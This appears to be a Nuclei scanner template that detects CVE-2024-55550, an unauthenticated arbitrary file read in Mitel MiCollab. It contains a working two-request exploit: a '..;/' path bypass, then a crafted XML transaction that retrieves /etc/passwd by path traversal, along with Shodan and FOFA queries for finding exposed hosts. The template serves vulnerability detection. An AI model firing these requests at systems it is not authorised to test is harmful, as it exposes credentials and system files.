id: CVE-2024-55550

info:
  name: Mitel MiCollab - Arbitrary File Read
  author: DhiyaneshDk,watchTowr
  severity: critical
  description: |
    The Mitel MiCollab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel MiCollab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
  impact: |
    Unauthenticated attackers can bypass authentication and exploit path traversal to read arbitrary files from the MiCollab server, exposing sensitive configuration, credentials, and system data.
  remediation: |
    Update Mitel MiCollab according to MISA-2024-0029 advisory to address the authentication bypass and path traversal vulnerabilities.
  reference:
    - https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
  classification:
    cve-id: CVE-2024-55550
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.4
    epss-score: 0.17725
    epss-percentile: 0.95239
    cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:*:-:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "users"
          - "Network Element"
        condition: and
        internal: true

  - raw:
      - |
        POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2F10%2FXMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E2%3C%2FtransactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3Ccriteria+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E%3C%2Fcriteria%3E%3CoperationConfig+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CdataSource%3Esummary_reports%3C%2FdataSource%3E%3CoperationType%3Efetch%3C%2FoperationType%3E%3C%2FoperationConfig%3E%3CappID%3EbuiltinApplication%3C%2FappID%3E%3Coperation%3EdownloadReport%3C%2Foperation%3E%3ColdValues+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Felem%3E%3C%2Foperations%3E%3Cjscallback%3Ex%3C%2Fjscallback%3E%3C%2Ftransaction%3E&protocolVersion=1.0&__iframeTarget__=x

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "micollab_api:.*:.*"
# digest: 4a0a00473045022020acb589a85eeaf04a006aca1ee8e28c04cfd580db8b7c00afcbac6d98bf5d0f022100e0c46500a23f172dc9b9301da9b4d92712f9915aca295bdac54b8aa84ed6a6fe:922c64590222798bb761d5b6d8e72950